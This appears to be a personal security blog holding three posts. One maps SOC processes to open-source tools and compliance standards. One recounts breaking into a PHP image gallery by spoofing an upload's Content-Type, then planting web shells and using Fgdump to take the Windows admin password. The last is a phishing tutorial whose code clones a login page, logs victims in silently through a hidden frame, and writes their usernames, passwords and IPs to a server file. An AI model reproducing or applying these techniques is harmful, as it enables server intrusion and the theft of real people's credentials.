Security is my birth right, via open source I will have it !

Ascending one step in the Maslow’s hierarchy when we go beyond the basic needs, we reach at the second step which entails security as the next basic need of mankind. But when it comes to business, security is the privilege of a few. Much of this is attributed to the cost incurred for securing an enterprise. At the same time, the technologies for implementing security are progressing by leaps and bounds. This kind of results in a vicious circle, especially for the small and medium industries.

Last year, during my summers I came across this concept of a Security Operations Center (SOC) and how it contributes towards securing an organization’s information boundaries, if implemented properly. Then I found a wonderful paper from SANS about log management and its relevance in a SOC [1]. There were a few commercial and open source tools listed here and there for setting up a SOC. OSSIM is the undoubted choice in open source software. It contains a combination of few wonderful open source tools which can aid in Incident Management. But one big gap which I as a management student felt in these open source tools was lack of compliance specific reporting capabilities. Compliance being one the major drivers for security, can prove to be a boon if introduced in the open source world. It can also help SMEs in cutting the cost of abiding by the mandatory compliances.

This chain of thoughts motivated me to combine the processes taking place within a SOC with open source tools which can help carry out these processes. And further I mapped these processes with a few compliances I knew at that time. I ignored a few factors like skills required to run these open source tools, cost of support and maintenance etc. These factors would surely add to the Total Cost of Ownership (TCO) if implemented in real, but for the sake of theoretical simplicity I’ve ignored them for a while.

The final sheet prepared, contains FIPS (Federal Information Processing Standards) domains as the classification criteria for the SOC processes. Open source tools (if any) to fulfil the process requirements have been listed alongwith the process. Finally these processes have been mapped with the following compliances/standards/frameworks:

1. ISO 27001 & 27005
2. GLBA
3. PCI-DSS
4. FISMA
5. HIPAA
6. COBIT

An overview of the mapping can be taken here: SOC_process_tool_compliance

Although I’ve tried to compile the list with the best of my knowledge, there’s still a lot of scope for correction. I’d be looking forward for reader’s comment on the same.

PS: Metasploit Pro is now coming with compliance capabilities. Hope they soon introduce the feature in open source version as well.

REFERENCES:

[1] NIST SP 800-92: Guide to Computer Security Log Management

Advertisements

PHP: Please Hack Pal.

I always read, PHP applications are a security guy’s nightmare. Always thought why, Coming from a world of packets and frames code made lesser sense. Until I stumbled upon this application. The application was an Image gallery, with a lot of nice cool pics and an option to share and upload pics. This was a PHP application. Oh, it was fun!

I thought of playing with it. As soon as I checked the Image upload option, the security freak in me took over.

First Shot: Tried uploading a exe file to the application

Result: Failed (Error: You can only upload Image files)

Second Shot:Tried uploading a php file

Result: Failed (Error: You can only upload Image files)

So I knew will have to fiddle around with some options. Used the best friend of a web app hacker: a Web Proxy.

BURP was my tool of choice

Running Burp, I checked what travels and I saw this:

Content-Type: application/octet-stream

and I changed this to

Content-Type: image/jpeg

And here we go! I was able to upload whatever I wanted, from exe to jpeg images.

So what next? Uploaded the Php Web Broswer and browsed to it. As expected, I had a directory listing to all the files on the server!

I also uploaded PHP Shell which worked like a charm. It allows running commands interactively as if you are working on the cmd shell.

But, I wanted to upload some files to the server. I could have done that by changing the content type field and uploading the file. but I am too lazy for that!

So i uploaded Extplorer. eXtplorer is a nice tool. what more, it allows uploading files also! But, the security freak in me was not content with these files, I was looking to have full access to the windows box. So, I wanted the best of all WINDOWS PASSWORD, nothing beats having a windows admin password!

I also tried c99 php hacker shell It has a lot of features. If you want access to Database its a nice tool to use and it is easy to find DB user credentials when you have access  to the site directory.

I uploaded Fgdump and called it from the browser. Soon, I had the admin hashes. Searched through rainbow tables and got the password! Pretty simple, eh? Ok, lets call it “Sweetgrape”.

Hmmm, but even that was not enough! I wanted to get full GUI access of the machine. That must be easy using some VNC server or a reverse listener, right?

For that wait for the next episode … …

Phishing: The Refined Way

DISCLAIMER: All content provided hereby is solely for informative purposes. Please do not misuse it. I’m not responsible for any damage caused by the misuse of the information.

In his book “Phishing Exposed” Lance James says that there’s no static definition for the word “Phishing” since the technique itself is constantly evolving. Further he states that phishing is a variant of the word fishing in a sense that the attacker sets out “hooks” hoping that he will get a few “bites” from his victims.

Be it Fishing, or Phishing, they are all the same: catch the fish, ignorant about the authenticity of the bait given to it. The fish (read victim) doesn’t have any way to ensure the authenticity of the bait, until and unless it uses its intelligence. A blend of lack of awareness and visual deception, both on the part of victim, is just the right recipe for a perfect phish.

Since these pages exploit the human element of security there’s really no strong defense against them except awareness to indicators. And hence, depending on the level of internet experience of the victim the approaches to phishing vary.

Lately while I was trying to create a phishing page, I came across a number of articles on the internet. The commonest approach followed was to send the user a spoofed link, let him login the phished page, record his credentials and redirect him to the legitimate login page. This whole process makes the victim login “twice” in order to access his/her account. I stress on twice because this process of logging in twice can raise suspicion in the mind of the victim. So, I thought of making a phish page which doesn’t make the users enter their credentials twice. As soon as the victim tries to login through the fake page his login information is logged on by the hacker and at the same time a request is sent to the legitimate login page which processes the request and logs in the victim to the real account.

Now the first (and of course the most intuitive) thing I could think to accomplish this was through iframe. I see the readers out there already getting my point! Okay, but to my dismay many login pages don’t support iframes. By not supporting I mean that the login page is coded to be in the top location of the window in the DOM. And as soon as it detects it’s not, it redirects to some legitimate page within the site.

Help finally came in the form of AJAX and cURL. For those who have already got the hint can leave reading here and start phishing! And those who haven’t yet, read on:

In this method the retrieved passwords are logged in a text file at the server. It is to be noted that they can also be sent through mail or written to a database on the server.  Further I assume that the reader has some prior knowledge of phishing.

  1. Create a file as “yoursite.php” (or any other name you wish, but of course with the correct file extension). This is the same file as the original login page file i.e. a saved copy of the entire HTML page which you want to replicate. Name it something which resembles the genuine login page as we would be sending the URL of this fake page to the victim. Be careful of the file extension. It should NOT be html because we need to insert server side code into it.
  2. Once the replica is ready we now need to load the genuine page somewhere in this page in order to pass the request to the legitimate server as well. So, what we do is make an invisible div and load the genuine login page into it.

    <div style=”display:none;”>                     //making an invisible div element

    <?php

    $url = “enter the correct URL here”;    //e.g. mail.xyz.com

    $page = file_get_contents($url);

    echo “<HR>”;

    echo $page;

    ?>

    </div>

    The file_get_contents() works for paid hosts but not for free hosting. Guess they fear Remote File Inclusion. 😉

    So, you can alternately use cURL to achieve the same effect:

    <div style=”display:none;”>

    <?php

    function curl_get_file_contents($URL)

    {

    $c = curl_init();

    curl_setopt($c, CURLOPT_RETURNTRANSFER, 1);

    curl_setopt($c, CURLOPT_URL, $URL);

    $contents = curl_exec($c);

    curl_close($c);

    if ($contents) return $contents;

    else return FALSE;

    }

    $url = “enter the correct URL here “;    //e.g. mail.xyz.com

    $page = curl_get_file_contents($url);

    echo “<HR>”;

    echo $page;

    ?>

    </div>

  3. Next we do a bit of AJAX to make a synchronous request. Add a piece of code in the fake page:
  4. <script language=”JavaScript”>

    function GetXmlHttpObject(){

    var xmlHttp=null;

    try{

    // Firefox, Opera 8.0+, Safari

    xmlHttp=new XMLHttpRequest();

    }

    catch (e){

    // Internet Explorer

    try{

    xmlHttp=new ActiveXObject(“Msxml2.XMLHTTP”);

    }

    catch (e){

    xmlHttp=new ActiveXObject(“Microsoft.XMLHTTP”);

    }

    }

    return xmlHttp;

    }

    Now pass the values entered by the user in the fake page, to the genuine page which is hidden in the invisible div element. Note that the values to the left are the original DOM elements as used in the genuine page. In the right we’ve variables used in the fake page. Be careful about matching them to the exact variables used in whichever page you are faking.

    For example: username is the variable being used in the genuine page and username1 is the variable I used in the “yoursite.php” page. Though you can keep both the same, I’ve used separate names in order to distinguish between the two.

    function flashCacheReady (initialized){             //invoked directly by Flash

    }

    function send_value(){

    document.getElementById(“username”).value = document.getElementById(“username1”).value;

    document.getElementById(“passwd”).value = document.getElementById(“passwd1”).value;

    url = “set.php?username=” + document.getElementById(“username”).value + “&passwd=” + document.getElementById(“passwd”).value;

    url = url + “&sid=” + Math.random();

    xmlHttp=GetXmlHttpObject();

    xmlHttp.onreadystatechange=function(){

    // Just a dummy callback function. Callback not required as we are using  SYNCHRONOUS request (see false in open method below)

    }// end of onreadystatechange function

    // SYNCHRONOUS CALL used to ensure we submit the actual form only after we make sure we have credentials

    xmlHttp.open(“GET”,url,false);

    xmlHttp.send(null);

    document.forms[1].submit();                   //Submit the legitimate page

    return false;

    }

    set.php is the file I’ve made to record the credentials on the server. The contents of this file are mentioned in step 3. You can rename it, again being careful of the extension. If the genuine server uses nonces or random values, you can make use of the random() function, else scrap it.

    The above code works to submit the credentials entered by the user in the fake page to the legitimate yahoo page loaded in the invisible div. At the same time, it sends values to set.php which are used in creating a text log of the login credentials.

    3. We now make the second file used to write the credentials to a text file on the server.

    $filename = ‘credentials.txt’;

    $username = $_GET[“username”];

    $password = $_GET[“passwd”];

    $ip=$_SERVER[“REMOTE_ADDR”];

    $date = date(“m/d/y G.i:s”, time());

    $fp = fopen(“$filename”, “a”);

    $message .= “Name: “.$username.”\n\n”;

    $message.= “Pass: “.$password.”\n\n”;

    $message .= “IP:   “.$ip.”\n\n”;

    $message .= “Date: “.$date.”\n\n”;

    $write = fwrite($fp, $message);

    fclose($fp);

So that’s it. Don’t forget to make a text file on the server with the name credentials.txt and assign read/write privileges to it. I’m not including the full source code lest it might be used by script kiddies. Special thanks to Shivam Patel & Abhijit Seam for helping me on this. Happy *ishing! 🙂